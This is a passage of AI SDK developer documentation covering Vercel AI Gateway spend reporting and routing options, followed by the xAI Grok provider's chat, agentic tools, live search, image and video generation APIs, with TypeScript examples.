- model string - Filter to a specific model (e.g. 'anthropic/claude-sonnet-4.5')
- provider string - Filter to a specific provider (e.g. 'anthropic')
- credentialType string - Filter by 'byok' or 'system' credentials
- tags string[] - Filter to requests matching these tags
Each row in results contains a grouping field (matching your groupBy choice) and metrics:
- totalCost number - Total cost in USD
- marketCost number - Market cost in USD
- inputTokens number - Number of input tokens
- outputTokens number - Number of output tokens
- cachedInputTokens number - Number of cached input tokens
- cacheCreationInputTokens number - Number of cache creation input tokens
- reasoningTokens number - Number of reasoning tokens
- requestCount number - Number of requests
You can combine tracking and querying to analyze spend by tags you defined:
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { gateway, streamText } from 'ai';
// 1. Make requests with tags
const result = streamText({
model: gateway('anthropic/claude-haiku-4.5'),
prompt: "Summarize this quarter's results",
providerOptions: {
gateway: {
tags: ['team:finance', 'feature:summaries'],
} satisfies GatewayProviderOptions,
},
});
// 2. Later, query spend filtered by those tags
const report = await gateway.getSpendReport({
startDate: '2026-03-01',
endDate: '2026-03-31',
groupBy: 'tag',
tags: ['team:finance'],
});
for (const row of report.results) {
console.log(`${row.tag}: $${row.totalCost.toFixed(4)} (${row.requestCount} requests)`);
}
Provider Options
The AI Gateway provider accepts provider options that control routing behavior and provider-specific configurations.
Gateway Provider Options
You can use the gateway key in providerOptions to control how AI Gateway routes requests:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Explain quantum computing",
providerOptions: {
gateway: {
order: ["vertex", "anthropic"], // Try Vertex AI first, then Anthropic
only: ["vertex", "anthropic"], // Only use these providers
} satisfies GatewayProviderOptions,
},
});
The following gateway provider options are available:
- order string[]
  Specifies the sequence of providers to attempt when routing requests. The gateway will try providers in the order specified. If a provider fails or is unavailable, it will move to the next provider in the list.
  Example: order: ['bedrock', 'anthropic'] will attempt Amazon Bedrock first, then fall back to Anthropic.
- only string[]
  Restricts routing to only the specified providers. When set, the gateway will never route to providers not in this list, even if they would otherwise be available.
  Example: only: ['anthropic', 'vertex'] will only allow routing to Anthropic or Vertex AI.
- sort 'cost' | 'ttft' | 'tps'
  Sorts available providers by a performance or cost metric before routing. The gateway will try the best-scoring provider first and fall back through the rest in sorted order. If unspecified, providers are ordered using the gateway's default system ranking.
  - 'cost' - lowest cost first
  - 'ttft' - lowest time-to-first-token first
  - 'tps' - highest tokens-per-second first
  When combined with order, the user-specified providers are promoted to the front while remaining providers follow the sorted order.
  Example: sort: 'ttft' will route to the provider with the fastest time-to-first-token.
  When sort is active, the response's providerMetadata.gateway.routing.sort object contains the sort option used, the resulting execution order, per-provider metric values, and any providers that were deprioritized.
- models string[]
  Specifies fallback models to use when the primary model fails or is unavailable. The gateway will try the primary model first (specified in the model parameter), then try each model in this array in order until one succeeds.
  Example: models: ['openai/gpt-5.4-nano', 'gemini-3-flash-preview'] will try the fallback models in order if the primary model fails.
- user string
  Optional identifier for the end user on whose behalf the request is being made. This is used for spend tracking and attribution purposes, allowing you to track usage per end-user in your application.
  Example: user: 'user-123' will associate this request with end-user ID "user-123" in usage reports.
- tags string[]
  Optional array of tags for categorizing and filtering usage in reports. Useful for tracking spend by feature, prompt version, or any other dimension relevant to your application.
  Example: tags: ['chat', 'v2'] will tag this request with "chat" and "v2" for filtering in usage analytics.
- byok Record<string, Array<Record<string, unknown>>>
  Request-scoped BYOK (Bring Your Own Key) credentials to use for this request. When provided, any cached BYOK credentials configured in the gateway system are not considered. Requests may still fall back to use system credentials if the provided credentials fail.
  Each provider can have multiple credentials (tried in order). The structure is a record where keys are provider slugs and values are arrays of credential objects.
  Examples:
  - Single provider: byok: { 'anthropic': [{ apiKey: 'sk-ant-...' }] }
  - Multiple credentials: byok: { 'vertex': [{ project: 'proj-1', googleCredentials: { privateKey: '...', clientEmail: '...' } }, { project: 'proj-2', googleCredentials: { privateKey: '...', clientEmail: '...' } }] }
  - Multiple providers: byok: { 'anthropic': [{ apiKey: '...' }], 'bedrock': [{ accessKeyId: '...', secretAccessKey: '...' }] }
- zeroDataRetention boolean
  Restricts routing requests to providers that have zero data retention agreements with Vercel for AI Gateway. If there are no providers available for the model with zero data retention, the request will fail. BYOK credentials are skipped when zeroDataRetention is set to true to ensure that requests are only routed to providers that support ZDR compliance. Request-level ZDR is only available for Vercel Pro and Enterprise plans.
- disallowPromptTraining boolean
  Restricts routing requests to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. If there are no providers available for the model that disallow prompt training, the request will fail. BYOK credentials are skipped when disallowPromptTraining is set to true to ensure that requests are only routed to providers that do not train on prompt data.
- hipaaCompliant boolean
  Restricts routing to models and tools from providers that have signed a BAA with Vercel for the use of AI Gateway (requires the Vercel HIPAA BAA add-on). BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
- quotaEntityId string
  The unique identifier for the entity against which quota is tracked. Used for quota management and enforcement purposes.
- providerTimeouts object
  Per-provider timeouts for BYOK credentials in milliseconds. Controls how long to wait for a provider to start responding before falling back to the next available provider.
  Example: providerTimeouts: { byok: { openai: 5000, anthropic: 2000 } }
  For full details, see Provider Timeouts.
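For example, you can route to the provider with the fastest time-to-first-token using the sort option described above (a minimal sketch):
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Explain vector databases briefly",
  providerOptions: {
    gateway: {
      sort: "ttft", // try the lowest time-to-first-token provider first
    } satisfies GatewayProviderOptions,
  },
});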
You can combine these options to have fine-grained control over routing and tracking:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Write a haiku about programming",
providerOptions: {
gateway: {
order: ["vertex"], // Prefer Vertex AI
only: ["anthropic", "vertex"], // Only allow these providers
} satisfies GatewayProviderOptions,
},
});
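Request-scoped BYOK credentials follow the same pattern. As a minimal sketch (the environment variable name is a placeholder):
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Write a haiku about programming",
  providerOptions: {
    gateway: {
      byok: {
        // credentials are tried in order; system credentials remain the fallback
        anthropic: [{ apiKey: process.env.MY_ANTHROPIC_KEY ?? "" }],
      },
    } satisfies GatewayProviderOptions,
  },
});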
Model Fallbacks Example
The models option enables automatic fallback to alternative models when the primary model fails:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "openai/gpt-5.4", // Primary model
prompt: "Write a TypeScript haiku",
providerOptions: {
gateway: {
models: ["openai/gpt-5.4-nano", "gemini-3-flash-preview"], // Fallback models
} satisfies GatewayProviderOptions,
},
});
// This will:
// 1. Try openai/gpt-5.4 first
// 2. If it fails, try openai/gpt-5.4-nano
// 3. If that fails, try gemini-3-flash-preview
// 4. Return the result from the first model that succeeds
Zero Data Retention Example
Set zeroDataRetention to true to route requests to providers that have zero data retention agreements with Vercel for AI Gateway. If there are no providers available for the model with zero data retention, the request will fail. When zeroDataRetention is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when zeroDataRetention is set to true to ensure that requests are only routed to providers that support ZDR compliance. Request-level ZDR is only available for Vercel Pro and Enterprise plans.
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Analyze this sensitive document...",
providerOptions: {
gateway: {
zeroDataRetention: true,
} satisfies GatewayProviderOptions,
},
});
Disallow Prompt Training Example
Set disallowPromptTraining to true to route requests to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. If there are no providers available for the model that disallow prompt training, the request will fail. When disallowPromptTraining is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when disallowPromptTraining is set to true to ensure that requests are only routed to providers that do not train on prompt data.
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Analyze this proprietary business data...",
providerOptions: {
gateway: {
disallowPromptTraining: true,
} satisfies GatewayProviderOptions,
},
});
HIPAA Compliance Example
Set hipaaCompliant to true to route requests only to models or tools by providers that have signed a BAA with Vercel for the use of AI Gateway. If the model or tool does not have a HIPAA-compliant provider, the request will fail. When hipaaCompliant is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Analyze this patient data...",
providerOptions: {
gateway: {
hipaaCompliant: true,
} satisfies GatewayProviderOptions,
},
});
Quota Entity ID Example
Set quotaEntityId to track and enforce quota against a specific entity. This is useful for multi-tenant applications where you need to manage quota at the entity level (e.g., per organization or team).
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Summarize this report...",
providerOptions: {
gateway: {
quotaEntityId: "org-123",
} satisfies GatewayProviderOptions,
},
});
Provider-Specific Options
When using provider-specific options through AI Gateway, use the actual provider name (e.g. anthropic, openai, not gateway) as the key:
import type { AnthropicLanguageModelOptions } from "@ai-sdk/anthropic";
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Explain quantum computing",
providerOptions: {
gateway: {
order: ["vertex", "anthropic"],
} satisfies GatewayProviderOptions,
anthropic: {
thinking: { type: "enabled", budgetTokens: 12000 },
} satisfies AnthropicLanguageModelOptions,
},
});
This works with any provider supported by AI Gateway. Each provider has its own set of options - see the individual provider documentation pages for details on provider-specific options.
Available Providers
AI Gateway supports routing to 20+ providers.
For a complete list of available providers and their slugs, see the AI Gateway documentation.
Model Capabilities
Model capabilities depend on the specific provider and model you're using. For detailed capability information, see:
- AI Gateway provider options for an overview of available providers
- Individual AI SDK provider pages for specific model capabilities and features
title: xAI Grok description: Learn how to use xAI Grok and Imagine.
xAI Grok Provider
The xAI Grok provider contains language model support for the xAI API.
Setup
The xAI Grok provider is available via the @ai-sdk/xai module. You can
install it with:
pnpm add @ai-sdk/xai
Provider Instance
You can import the default provider instance xai from @ai-sdk/xai:
import { xai } from '@ai-sdk/xai';
If you need a customized setup, you can import createXai from @ai-sdk/xai
and create a provider instance with your settings:
import { createXai } from '@ai-sdk/xai';
const xai = createXai({
apiKey: 'your-api-key',
});
You can use the following optional settings to customize the xAI provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.x.ai/v1. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the XAI_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create xAI models using a provider instance. The
first argument is the model id, e.g. grok-4.20-non-reasoning.
const model = xai('grok-4.20-non-reasoning');
By default, xai(modelId) uses the Chat API. To use the Responses API with server-side agentic tools, explicitly use xai.responses(modelId).
Example
You can use xAI language models to generate text with the generateText function:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text } = await generateText({
model: xai('grok-4.20-non-reasoning'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
xAI language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Provider Options
xAI chat models support additional provider options that are not part of
the standard call settings. You can pass them in the providerOptions argument:
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const model = xai('grok-3-mini');
await generateText({
model,
providerOptions: {
xai: {
reasoningEffort: 'high',
} satisfies XaiLanguageModelChatOptions,
},
});
The following optional provider options are available for xAI chat models:
-
reasoningEffort 'low' | 'high'
Reasoning effort for reasoning models.
-
logprobs boolean
Return log probabilities for output tokens.
-
topLogprobs number
Number of most likely tokens to return per token position (0-8). When set,
logprobs is automatically enabled. -
parallel_function_calling boolean
Whether to enable parallel function calling during tool use. When true, the model can call multiple functions in parallel. When false, the model will call functions sequentially. Defaults to
true.
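For example, a minimal sketch requesting token log probabilities (the prompt is illustrative; topLogprobs enables logprobs automatically):
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
  model: xai('grok-3-mini'),
  prompt: 'Name three prime numbers.',
  providerOptions: {
    xai: {
      topLogprobs: 3, // also enables logprobs
    } satisfies XaiLanguageModelChatOptions,
  },
});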
Responses API (Agentic Tools)
You can use the xAI Responses API with the xai.responses(modelId) factory method for server-side agentic tool calling. This enables the model to autonomously orchestrate tool calls and research on xAI's servers.
const model = xai.responses('grok-4.20-non-reasoning');
The Responses API provides server-side tools that the model can autonomously execute during its reasoning process:
- web_search: Real-time web search and page browsing
- x_search: Search X (Twitter) posts, users, and threads
- code_execution: Execute Python code for calculations and data analysis
- view_image: View and analyze images
- view_x_video: View and analyze videos from X posts
- mcp_server: Connect to remote MCP servers and use their tools
- file_search: Search through documents in vector stores (collections)
Vision
The Responses API supports image input with vision models:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
import fs from 'node:fs';
const { text } = await generateText({
model: xai.responses('grok-3'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What do you see in this image?' },
{ type: 'image', image: fs.readFileSync('./image.png') },
],
},
],
});
Web Search Tool
The web search tool enables autonomous web research with optional domain filtering and image understanding:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'What are the latest developments in AI?',
tools: {
web_search: xai.tools.webSearch({
allowedDomains: ['arxiv.org', 'openai.com'],
enableImageUnderstanding: true,
}),
},
});
console.log(text);
console.log('Citations:', sources);
Web Search Parameters
-
allowedDomains string[]
Only search within specified domains (max 5). Cannot be used with
excludedDomains. -
excludedDomains string[]
Exclude specified domains from search (max 5). Cannot be used with
allowedDomains. -
enableImageUnderstanding boolean
Enable the model to view and analyze images found during search. Increases token usage.
X Search Tool
The X search tool enables searching X (Twitter) for posts, with filtering by handles and date ranges:
const { text, sources } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'What are people saying about AI on X this week?',
tools: {
x_search: xai.tools.xSearch({
allowedXHandles: ['elonmusk', 'xai'],
fromDate: '2025-10-23',
toDate: '2025-10-30',
enableImageUnderstanding: true,
enableVideoUnderstanding: true,
}),
},
});
X Search Parameters
-
allowedXHandles string[]
Only search posts from specified X handles (max 10). Cannot be used with
excludedXHandles. -
excludedXHandles string[]
Exclude posts from specified X handles (max 10). Cannot be used with
allowedXHandles. -
fromDate string
Start date for posts in ISO8601 format (
YYYY-MM-DD). -
toDate string
End date for posts in ISO8601 format (
YYYY-MM-DD). -
enableImageUnderstanding boolean
Enable the model to view and analyze images in X posts.
-
enableVideoUnderstanding boolean
Enable the model to view and analyze videos in X posts.
Code Execution Tool
The code execution tool enables the model to write and execute Python code for calculations and data analysis:
const { text } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt:
'Calculate the compound interest for $10,000 at 5% annually for 10 years',
tools: {
code_execution: xai.tools.codeExecution(),
},
});
View Image Tool
The view image tool enables the model to view and analyze images:
const { text } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'Describe what you see in the image',
tools: {
view_image: xai.tools.viewImage(),
},
});
View X Video Tool
The view X video tool enables the model to view and analyze videos from X (Twitter) posts:
const { text } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'Summarize the content of this X video',
tools: {
view_x_video: xai.tools.viewXVideo(),
},
});
MCP Server Tool
The MCP server tool enables the model to connect to remote Model Context Protocol (MCP) servers and use their tools:
const { text } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'Use the weather tool to check conditions in San Francisco',
tools: {
weather_server: xai.tools.mcpServer({
serverUrl: 'https://example.com/mcp',
serverLabel: 'weather-service',
serverDescription: 'Weather data provider',
allowedTools: ['get_weather', 'get_forecast'],
}),
},
});
MCP Server Parameters
-
serverUrl string (required)
The URL of the remote MCP server.
-
serverLabel string
A label to identify the MCP server.
-
serverDescription string
A description of what the MCP server provides.
-
allowedTools string[]
List of tool names that the model is allowed to use from the MCP server. If not specified, all tools are allowed.
-
headers Record<string, string>
Custom headers to include when connecting to the MCP server.
-
authorization string
Authorization header value for authenticating with the MCP server (e.g.,
'Bearer token123').
File Search Tool
The file search tool enables searching through documents stored in xAI vector stores (collections):
import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { streamText } from 'ai';
const result = streamText({
model: xai.responses('grok-4.20-reasoning'),
prompt: 'What documents do you have access to?',
tools: {
file_search: xai.tools.fileSearch({
vectorStoreIds: ['collection_your-collection-id'],
maxNumResults: 10,
}),
},
providerOptions: {
xai: {
include: ['file_search_call.results'],
} satisfies XaiLanguageModelResponsesOptions,
},
});
File Search Parameters
-
vectorStoreIds string[] (required)
The IDs of the vector stores (collections) to search.
-
maxNumResults number
The maximum number of results to return from the search.
Provider Options for File Search
-
include Array<'file_search_call.results'>
Include file search results in the response. When set to
['file_search_call.results'], the response will contain the actual search results with file content and scores.
Multiple Tools
You can combine multiple server-side tools for comprehensive research:
import { xai } from '@ai-sdk/xai';
import { streamText } from 'ai';
const { fullStream } = streamText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'Research AI safety developments and calculate risk metrics',
tools: {
web_search: xai.tools.webSearch(),
x_search: xai.tools.xSearch(),
code_execution: xai.tools.codeExecution(),
file_search: xai.tools.fileSearch({
vectorStoreIds: ['collection_your-documents'],
}),
data_service: xai.tools.mcpServer({
serverUrl: 'https://data.example.com/mcp',
serverLabel: 'data-service',
}),
},
});
for await (const part of fullStream) {
if (part.type === 'text-delta') {
process.stdout.write(part.text);
} else if (part.type === 'source' && part.sourceType === 'url') {
console.log('\nSource:', part.url);
}
}
Provider Options
The Responses API supports the following provider options:
import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
providerOptions: {
xai: {
reasoningEffort: 'high',
} satisfies XaiLanguageModelResponsesOptions,
},
// ...
});
The following provider options are available:
-
reasoningEffort 'low' | 'medium' | 'high'
Control the reasoning effort for the model. Higher effort may produce more thorough results at the cost of increased latency and token usage.
-
logprobs boolean
Return log probabilities for output tokens.
-
topLogprobs number
Number of most likely tokens to return per token position (0-8). When set,
logprobs is automatically enabled. -
include Array<'file_search_call.results'>
Specify additional output data to include in the model response. Use
['file_search_call.results'] to include file search results with scores and content. -
store boolean
Whether to store the input message(s) and model response for later retrieval. Defaults to
true. -
previousResponseId string
The ID of the previous response from the model. You can use it to continue a conversation.
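As a sketch, assuming you have the ID of an earlier response, previousResponseId continues that conversation (the ID string is a placeholder):
import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'What country is that city in?',
  providerOptions: {
    xai: {
      previousResponseId: 'resp_...', // ID returned by an earlier response
    } satisfies XaiLanguageModelResponsesOptions,
  },
});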
Live Search
xAI models support Live Search functionality, allowing them to query real-time data from various sources and include it in responses with citations.
Basic Search
To enable search, specify searchParameters with a search mode:
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: xai('grok-3-latest'),
prompt: 'What are the latest developments in AI?',
providerOptions: {
xai: {
searchParameters: {
mode: 'auto', // 'auto', 'on', or 'off'
returnCitations: true,
maxSearchResults: 5,
},
} satisfies XaiLanguageModelChatOptions,
},
});
console.log(text);
console.log('Sources:', sources);
Search Parameters
The following search parameters are available:
-
mode 'auto' | 'on' | 'off'
Search mode preference:
- 'auto' (default): Model decides whether to search
- 'on': Always enables search
- 'off': Disables search completely
-
returnCitations boolean
Whether to return citations in the response. Defaults to
true. -
fromDate string
Start date for search data in ISO8601 format (
YYYY-MM-DD). -
toDate string
End date for search data in ISO8601 format (
YYYY-MM-DD). -
maxSearchResults number
Maximum number of search results to consider. Defaults to 20, max 50.
-
sources Array<SearchSource>
Data sources to search from. Defaults to
["web", "x"]if not specified.
Search Sources
You can specify different types of data sources for search:
Web Search
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Best ski resorts in Switzerland',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
sources: [
{
type: 'web',
country: 'CH', // ISO alpha-2 country code
allowedWebsites: ['ski.com', 'snow-forecast.com'],
safeSearch: true,
},
],
},
} satisfies XaiLanguageModelChatOptions,
},
});
Web source parameters
- country string: ISO alpha-2 country code
- allowedWebsites string[]: Max 5 allowed websites
- excludedWebsites string[]: Max 5 excluded websites
- safeSearch boolean: Enable safe search (default: true)
X (Twitter) Search
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Latest updates on Grok AI',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
sources: [
{
type: 'x',
includedXHandles: ['grok', 'xai'],
excludedXHandles: ['openai'],
postFavoriteCount: 10,
postViewCount: 100,
},
],
},
} satisfies XaiLanguageModelChatOptions,
},
});
X source parameters
- includedXHandles string[]: Array of X handles to search (without @ symbol)
- excludedXHandles string[]: Array of X handles to exclude from search (without @ symbol)
- postFavoriteCount number: Minimum favorite count of the X posts to consider.
- postViewCount number: Minimum view count of the X posts to consider.
News Search
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Recent tech industry news',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
sources: [
{
type: 'news',
country: 'US',
excludedWebsites: ['tabloid.com'],
safeSearch: true,
},
],
},
} satisfies XaiLanguageModelChatOptions,
},
});
News source parameters
- country string: ISO alpha-2 country code
- excludedWebsites string[]: Max 5 excluded websites
- safeSearch boolean: Enable safe search (default: true)
RSS Feed Search
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Latest status updates',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
sources: [
{
type: 'rss',
links: ['https://status.x.ai/feed.xml'],
},
],
},
} satisfies XaiLanguageModelChatOptions,
},
});
RSS source parameters
- links string[]: Array of RSS feed URLs (max 1 currently supported)
Multiple Sources
You can combine multiple data sources in a single search:
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Comprehensive overview of recent AI breakthroughs',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
returnCitations: true,
maxSearchResults: 15,
sources: [
{
type: 'web',
allowedWebsites: ['arxiv.org', 'openai.com'],
},
{
type: 'news',
country: 'US',
},
{
type: 'x',
includedXHandles: ['openai', 'deepmind'],
},
],
},
} satisfies XaiLanguageModelChatOptions,
},
});
Sources and Citations
When search is enabled with returnCitations: true, the response includes sources that were used to generate the answer:
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: xai('grok-3-latest'),
prompt: 'What are the latest developments in AI?',
providerOptions: {
xai: {
searchParameters: {
mode: 'auto',
returnCitations: true,
},
} satisfies XaiLanguageModelChatOptions,
},
});
// Access the sources used
for (const source of sources) {
if (source.sourceType === 'url') {
console.log('Source:', source.url);
}
}
Streaming with Search
Live Search works with streaming responses. Citations are included when the stream completes:
import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { streamText } from 'ai';
const result = streamText({
model: xai('grok-3-latest'),
prompt: 'What has happened in tech recently?',
providerOptions: {
xai: {
searchParameters: {
mode: 'auto',
returnCitations: true,
},
} satisfies XaiLanguageModelChatOptions,
},
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log('Sources:', await result.sources);
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Reasoning |
|---|---|---|---|---|---|
| grok-4.20-reasoning | | | | | |
| grok-4.20-non-reasoning | | | | | |
| grok-4-1-fast-reasoning | | | | | |
| grok-4-1-fast-non-reasoning | | | | | |
| grok-4-1 | | | | | |
| grok-4-fast-reasoning | | | | | |
| grok-4-fast-non-reasoning | | | | | |
| grok-code-fast-1 | | | | | |
| grok-3 | | | | | |
| grok-3-mini | | | | | |
Image Models
You can create xAI image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().
import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: xai.image('grok-imagine-image'),
prompt: 'A futuristic cityscape at sunset',
});
Image Editing
xAI supports image editing through the grok-imagine-image model. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: xai.image('grok-imagine-image'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
});
Multi-Image Editing
Combine or reference multiple input images in the prompt:
import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';
const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');
const { images } = await generateImage({
model: xai.image('grok-imagine-image'),
prompt: {
text: 'Combine these two animals into a group photo',
images: [cat, dog],
},
});
Style Transfer
Apply artistic styles to an image:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: xai.image('grok-imagine-image'),
prompt: {
text: 'Transform this into a watercolor painting style',
images: [imageBuffer],
},
aspectRatio: '1:1',
});
Image Provider Options
You can customize the image generation behavior with provider-specific settings via providerOptions.xai:
import { xai, type XaiImageModelOptions } from '@ai-sdk/xai';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: xai.image('grok-imagine-image-pro'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
providerOptions: {
xai: {
resolution: '2k',
quality: 'high',
} satisfies XaiImageModelOptions,
},
});
-
resolution '1k' | '2k'
Output resolution.
1k produces ~1024×1024 images, 2k produces ~2048×2048 images (actual dimensions vary based on aspect ratio). Available for grok-imagine-image-pro. -
quality 'low' | 'medium' | 'high'
Image quality level. Higher quality may increase generation time.
Image Model Capabilities
| Model | Resolution | Aspect Ratios | Image Editing |
|---|---|---|---|
| grok-imagine-image-pro | 1k, 2k | 1:1, 16:9, 9:16, 4:3, 3:4, 3:2, 2:3, 2:1, 1:2, 19.5:9, 9:19.5, 20:9, 9:20, auto | |
| grok-imagine-image | 1k | 1:1, 16:9, 9:16, 4:3, 3:4, 3:2, 2:3, 2:1, 1:2, 19.5:9, 9:19.5, 20:9, 9:20, auto | |
Video Models
You can create xAI video models using the .video() factory method.
For more on video generation with the AI SDK see generateVideo().
This provider supports standard video generation from text prompts or image input, plus explicit video editing, video extension, and reference-to-video (R2V) operations.
Text-to-Video
Generate videos from text prompts:
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'A chicken flying into the sunset in the style of 90s anime.',
aspectRatio: '16:9',
duration: 5,
providerOptions: {
xai: {
pollTimeoutMs: 600000, // 10 minutes
} satisfies XaiVideoModelOptions,
},
});
Generation with Image Input
Generate videos using an image as the starting frame with an optional text prompt. This uses the standard generation path rather than a separate provider mode:
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: {
image: 'https://example.com/start-frame.png',
text: 'The cat slowly turns its head and blinks',
},
duration: 5,
providerOptions: {
xai: {
pollTimeoutMs: 600000, // 10 minutes
} satisfies XaiVideoModelOptions,
},
});
Video Editing
Edit an existing video using a text prompt by providing a source video URL via provider options:
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'Give the person sunglasses and a hat',
providerOptions: {
xai: {
mode: 'edit-video',
videoUrl: 'https://example.com/source-video.mp4',
pollTimeoutMs: 600000, // 10 minutes
} satisfies XaiVideoModelOptions,
},
});
Chaining and Concurrent Edits
The xAI-hosted video URL is available in providerMetadata.xai.videoUrl.
You can use it to chain sequential edits or branch into concurrent edits
using Promise.all:
import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';
const providerOptions = {
xai: {
mode: 'edit-video',
videoUrl: 'https://example.com/source-video.mp4',
pollTimeoutMs: 600000,
} satisfies XaiVideoModelOptions,
};
// Step 1: Apply an initial edit
const step1 = await generateVideo({
model: xai.video('grok-imagine-video'),
prompt: 'Add a party hat to the person',
providerOptions,
});
// Get the xAI-hosted URL from provider metadata
const step1VideoUrl = step1.providerMetadata?.xai?.videoUrl as string;
// Step 2: Apply two more edits concurrently, building on step 1
const [withSunglasses, withScarf] = await Promise.all([
generateVideo({
